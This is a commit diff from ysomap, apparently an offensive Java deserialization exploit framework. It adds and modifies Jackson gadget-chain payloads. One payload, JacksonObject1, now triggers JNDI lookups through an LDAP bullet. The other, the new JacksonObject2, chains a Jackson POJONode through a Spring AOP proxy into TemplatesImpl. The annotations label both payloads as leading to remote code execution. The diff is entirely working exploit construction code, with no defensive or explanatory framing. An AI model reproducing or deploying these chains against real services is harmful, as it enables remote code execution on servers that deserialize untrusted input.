update jackson

wh1t3p1g · Oct 14, 2023 · 76e58d4 · 76e58d4
1 parent 541b50e
commit 76e58d4
Show file tree

Hide file tree

Showing 3 changed files with 53 additions and 18 deletions.
diff --git a/core/src/main/java/ysomap/core/util/PayloadHelper.java b/core/src/main/java/ysomap/core/util/PayloadHelper.java
@@ -3,6 +3,7 @@
 import com.sun.org.apache.bcel.internal.classfile.Utility;
 import com.sun.org.apache.xpath.internal.objects.XString;
 import org.apache.shiro.subject.SimplePrincipalCollection;
+import org.springframework.aop.framework.AdvisedSupport;
 
 import javax.swing.event.EventListenerList;
 import javax.swing.undo.UndoManager;
@@ -46,6 +47,15 @@ public static <T> T createProxy ( final InvocationHandler ih, final Class<T> ifa
         return iface.cast(Proxy.newProxyInstance(PayloadHelper.class.getClassLoader(), allIfaces, ih));
     }
 
+    public static Object makeSpringAOPProxy(Class<?> clazz, Object obj) throws Exception {
+        AdvisedSupport advisedSupport = new AdvisedSupport();
+        advisedSupport.setTarget(obj);
+        InvocationHandler handler =
+                (InvocationHandler) ReflectionHelper.createWithoutConstructor("org.springframework.aop.framework.JdkDynamicAopProxy");
+        ReflectionHelper.setFieldValue(handler, "advised", advisedSupport);
+        return Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{clazz}, handler);
+    }
+
 
     public static Map<String, Object> createMap ( final String key, final Object val ) {
         final Map<String, Object> map = new HashMap<>();

diff --git a/core/src/main/java/ysomap/payloads/java/jackson/JacksonObject1.java b/core/src/main/java/ysomap/payloads/java/jackson/JacksonObject1.java
@@ -1,18 +1,12 @@
 package ysomap.payloads.java.jackson;
 
 import com.fasterxml.jackson.databind.node.POJONode;
-import org.springframework.aop.framework.AdvisedSupport;
 import ysomap.bullets.Bullet;
-import ysomap.bullets.jdk.TemplatesImplBullet;
+import ysomap.bullets.jdk.LdapAttributeBullet;
 import ysomap.common.annotation.*;
 import ysomap.core.util.PayloadHelper;
-import ysomap.core.util.ReflectionHelper;
 import ysomap.payloads.AbstractPayload;
 
-import javax.xml.transform.Templates;
-import java.lang.reflect.InvocationHandler;
-import java.lang.reflect.Proxy;
-
 /**
  * @author whocansee
  * @since 2023/10/7
@@ -22,25 +16,19 @@
 @SuppressWarnings({"rawtypes"})
 @Authors({ Authors.whocansee })
 @Targets({Targets.JDK})
-@Require(bullets = {"TemplatesImplBullet"}, param = false)
-@Dependencies({"spring-aop", "jackson"})
-@Details("jackson & spring-aop trigger templates to rce")
+@Require(bullets = {"LdapAttributeBullet"}, param = false)
+@Dependencies({"jackson"})
+@Details("jackson trigger jndi to rce")
 public class JacksonObject1 extends AbstractPayload<Object> {
 
     @Override
     public Bullet getDefaultBullet(Object... args) throws Exception {
-        return TemplatesImplBullet.newInstance(args);
+        return LdapAttributeBullet.newInstance(args);
     }
 
     @Override
     public Object pack(Object obj) throws Exception {
-        AdvisedSupport advisedSupport = new AdvisedSupport();
-        advisedSupport.setTarget(obj);
-        InvocationHandler handler =
-                (InvocationHandler) ReflectionHelper.createWithoutConstructor("org.springframework.aop.framework.JdkDynamicAopProxy");
-        ReflectionHelper.setFieldValue(handler, "advised", advisedSupport);
-        Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
-        POJONode node = new POJONode(proxy);
+        POJONode node = new POJONode(obj);
         return PayloadHelper.makeReadObjectToStringTrigger(node);
     }
 }
diff --git a/core/src/main/java/ysomap/payloads/java/jackson/JacksonObject2.java b/core/src/main/java/ysomap/payloads/java/jackson/JacksonObject2.java
@@ -0,0 +1,37 @@
+package ysomap.payloads.java.jackson;
+
+import com.fasterxml.jackson.databind.node.POJONode;
+import ysomap.bullets.Bullet;
+import ysomap.bullets.jdk.TemplatesImplBullet;
+import ysomap.common.annotation.*;
+import ysomap.core.util.PayloadHelper;
+import ysomap.payloads.AbstractPayload;
+
+import javax.xml.transform.Templates;
+
+/**
+ * @author whocansee
+ * @since 2023/10/7
+ * https://xz.aliyun.com/t/12846
+ */
+@Payloads
+@SuppressWarnings({"rawtypes"})
+@Authors({ Authors.whocansee })
+@Targets({Targets.JDK})
+@Require(bullets = {"TemplatesImplBullet"}, param = false)
+@Dependencies({"spring-aop", "jackson"})
+@Details("jackson & spring-aop trigger templates to rce")
+public class JacksonObject2 extends AbstractPayload<Object> {
+
+    @Override
+    public Bullet getDefaultBullet(Object... args) throws Exception {
+        return TemplatesImplBullet.newInstance(args);
+    }
+
+    @Override
+    public Object pack(Object obj) throws Exception {
+        Object proxy = PayloadHelper.makeSpringAOPProxy(Templates.class, obj);;
+        POJONode node = new POJONode(proxy);
+        return PayloadHelper.makeReadObjectToStringTrigger(node);
+    }
+}